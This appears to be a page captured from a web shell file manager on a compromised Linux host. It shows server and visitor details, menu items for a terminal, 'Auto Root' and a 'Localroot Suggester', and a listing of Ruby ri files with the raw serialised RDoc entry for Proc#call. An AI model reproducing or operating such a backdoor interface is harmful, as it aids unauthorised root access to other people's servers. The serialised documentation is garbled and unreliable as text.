Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Proc /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3c-i.ri
692
B
-rw-r--r--
2026-04-07 17:42
%3d%3d%3d-i.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
%3d%3d-i.ri
1.05
KB
-rw-r--r--
2026-04-07 17:42
%3e%3e-i.ri
1.05
KB
-rw-r--r--
2026-04-07 17:42
%5b%5d-i.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
arity-i.ri
2
KB
-rw-r--r--
2026-04-07 17:42
binding-i.ri
521
B
-rw-r--r--
2026-04-07 17:42
call-i.ri
1.66
KB
-rw-r--r--
2026-04-07 17:42
cdesc-Proc.ri
12.52
KB
-rw-r--r--
2026-04-07 17:42
curry-i.ri
2.27
KB
-rw-r--r--
2026-04-07 17:42
eql%3f-i.ri
1010
B
-rw-r--r--
2026-04-07 17:42
hash-i.ri
390
B
-rw-r--r--
2026-04-07 17:42
inspect-i.ri
378
B
-rw-r--r--
2026-04-07 17:42
lambda%3f-i.ri
3.56
KB
-rw-r--r--
2026-04-07 17:42
new-c.ri
594
B
-rw-r--r--
2026-04-07 17:42
parameters-i.ri
1010
B
-rw-r--r--
2026-04-07 17:42
ruby2_keywords-i.ri
1.75
KB
-rw-r--r--
2026-04-07 17:42
source_location-i.ri
457
B
-rw-r--r--
2026-04-07 17:42
to_proc-i.ri
399
B
-rw-r--r--
2026-04-07 17:42
to_s-i.ri
402
B
-rw-r--r--
2026-04-07 17:42
yield-i.ri
1.51
KB
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" call:ETI"Proc#call;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"HInvokes the block, setting the block's parameters to the values in ;TI"F<i>params</i> using something close to method calling semantics. ;TI"EReturns the value of the last expression evaluated in the block.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [ I"Oa_proc = Proc.new {|scalar, *values| values.map {|value| value*scalar } } ;TI"0a_proc.call(9, 1, 2, 3) #=> [9, 18, 27] ;TI"0a_proc[9, 1, 2, 3] #=> [9, 18, 27] ;TI"0a_proc.(9, 1, 2, 3) #=> [9, 18, 27] ;TI"0a_proc.yield(9, 1, 2, 3) #=> [9, 18, 27] ;T:@format0o; ; [I"HNote that <code>prc.()</code> invokes <code>prc.call()</code> with ;TI"@the parameters given. It's syntactic sugar to hide "call".;T@o; ; [ I"FFor procs created using #lambda or <code>->()</code> an error is ;TI"Cgenerated if the wrong number of parameters are passed to the ;TI"Cproc. For procs created using Proc.new or Kernel.proc, extra ;TI"Fparameters are silently discarded and missing parameters are set ;TI"to +nil+.;T@o;; [ I""a_proc = proc {|a,b| [a,b] } ;TI"#a_proc.call(1) #=> [1, nil] ;TI" ;TI"$a_proc = lambda {|a,b| [a,b] } ;TI"Wa_proc.call(1) # ArgumentError: wrong number of arguments (given 1, expected 2) ;T; 0o; ; [I"See also Proc#lambda?.;T: @fileI"proc.c;T:0@omit_headings_from_table_of_contents_below0I"}prc.call(params,...) -> obj prc[params,...] -> obj prc.(params,...) -> obj prc.yield(params,...) -> obj ;T0[[I"[];T@ [I"===;T@ [I" yield;T@ I"(*args);T@-FI" Proc;TcRDoc::NormalClass00